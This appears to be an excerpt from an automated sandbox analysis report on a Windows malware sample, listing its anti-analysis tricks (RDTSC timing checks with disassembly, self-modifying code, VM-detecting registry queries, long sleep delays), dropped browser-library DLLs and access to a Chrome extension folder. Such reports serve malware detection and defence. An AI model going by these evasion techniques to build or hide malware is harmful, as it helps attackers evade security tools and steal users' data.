                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C2077D second address: 4C207A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C207A1 second address: 4C207B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C207B4 second address: 4C207CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E054h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C207CC second address: 4C207D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C207D0 second address: 4C207E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F73D4D0E04Dh 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C207E8 second address: 4C207EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C207EE second address: 4C207F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C207F2 second address: 4C20818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov esi, edx 0x0000000c push eax 0x0000000d push edx 0x0000000e call 00007F73D4C57617h 0x00000013 pop ecx 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C20818 second address: 4C208AC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F73D4D0E059h 0x00000008 add ax, F946h 0x0000000d jmp 00007F73D4D0E051h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007F73D4D0E04Eh 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F73D4D0E04Dh 0x00000027 and ecx, 2FEFF156h 0x0000002d jmp 00007F73D4D0E051h 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007F73D4D0E050h 0x00000039 sbb esi, 7B622378h 0x0000003f jmp 00007F73D4D0E04Bh 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C208AC second address: 4C208C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C57614h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C10A63 second address: 4C10A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C10A69 second address: 4C10A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C10A6D second address: 4C10AAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F73D4D0E04Bh 0x00000011 pushfd 0x00000012 jmp 00007F73D4D0E058h 0x00000017 add ah, FFFFFFB8h 0x0000001a jmp 00007F73D4D0E04Bh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C10AAD second address: 4C10AD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F73D4C5760Ah 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C10AD8 second address: 4C10AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, 1181ADC7h 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ax, dx 0x00000014 popad 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C10AED second address: 4C10AFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C5760Ah 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C108B1 second address: 4C108B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C108B5 second address: 4C108BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB00EA second address: 4BB00F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB00F0 second address: 4BB00F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB00F6 second address: 4BB00FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB00FA second address: 4BB00FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB00FE second address: 4BB010F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, 21D1h 0x00000010 popad 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB010F second address: 4BB0131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57617h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB0131 second address: 4BB0137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB0137 second address: 4BB014B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 5CE5416Eh 0x00000008 mov ecx, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB014B second address: 4BB014F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB014F second address: 4BB0155 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C10DE3 second address: 4C10E0E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F73D4D0E052h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F73D4D0E04Eh 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C10E0E second address: 4C10E14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C10E14 second address: 4C10E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov si, bx 0x0000000d pushfd 0x0000000e jmp 00007F73D4D0E04Bh 0x00000013 or si, 931Eh 0x00000018 jmp 00007F73D4D0E059h 0x0000001d popfd 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F73D4D0E058h 0x00000028 and ax, 8048h 0x0000002d jmp 00007F73D4D0E04Bh 0x00000032 popfd 0x00000033 popad 0x00000034 push dword ptr [ebp+0Ch] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C10E84 second address: 4C10E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57617h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C10E9F second address: 4C10EDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F73D4D0E058h 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C10EDB second address: 4C10EDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C10EDF second address: 4C10EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C10F31 second address: 4C10F41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C5760Ch 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C10F41 second address: 4C10F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C10F45 second address: 4C10F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx eax, al 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F73D4C5760Ah 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BC0550 second address: 4BC059C instructions: 0x00000000 rdtsc 0x00000002 call 00007F73D4D0E054h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F73D4D0E050h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F73D4D0E050h 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F73D4D0E04Ah 0x00000022 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BC059C second address: 4BC05AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BC05AB second address: 4BC0602 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b jmp 00007F73D4D0E04Eh 0x00000010 call 00007F73D4D0E049h 0x00000015 jmp 00007F73D4D0E050h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F73D4D0E04Eh 0x00000022 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BC0602 second address: 4BC061B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BC061B second address: 4BC061F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BC061F second address: 4BC0631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BC0631 second address: 4BC0676 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F73D4D0E059h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F73D4D0E053h 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSpecial instruction interceptor: First address: 9CB602 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSpecial instruction interceptor: First address: 9F3DA4 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSpecial instruction interceptor: First address: 9DCA32 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeSpecial instruction interceptor: First address: A5DCCD instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: FAB602 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: FD3DA4 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: FBCA32 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSpecial instruction interceptor: First address: 103DCCD instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeCode function: 8_2_04C10D9B rdtsc 8_2_04C10D9B
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 553Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 8069Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 1931Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1055Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1061Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 406Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1119Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1097Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow / User API: threadDelayed 1086Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeWindow / User API: threadDelayed 735Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeAPI coverage: 0.8 %
                        Source: C:\Users\user\Desktop\file.exe TID: 3520Thread sleep count: 553 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6308Thread sleep time: -48024s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3260Thread sleep count: 1055 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3260Thread sleep time: -2111055s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5344Thread sleep count: 1061 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5344Thread sleep time: -2123061s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3200Thread sleep count: 406 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3200Thread sleep time: -12180000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7244Thread sleep time: -900000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2832Thread sleep count: 1119 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2832Thread sleep time: -2239119s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 380Thread sleep count: 219 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 380Thread sleep time: -438219s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2524Thread sleep count: 1097 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2524Thread sleep time: -2195097s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4092Thread sleep count: 1086 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4092Thread sleep time: -2173086s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe TID: 7296Thread sleep count: 735 > 30Jump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9CC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,0_2_6C9CC930
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Essential Server Solutions without Hyper-V
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: #Windows 10 Microsoft Hyper-V Server
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Microsoft Hyper-V Server
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Standard without Hyper-V
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Microsoft Hyper-V Server
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
                        Source: file.exe, file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
                        Source: BAEBFIIE.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                        Source: BAEBFIIE.0.drBinary or memory string: global block list test formVMware20,11696487552
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
                        Source: file.exe, 00000000.00000002.2271711490.000000000122C000.00000040.00000001.01000000.00000003.sdmp, a62ee169b8.exe, 0000000C.00000002.2395229335.0000000000B3C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
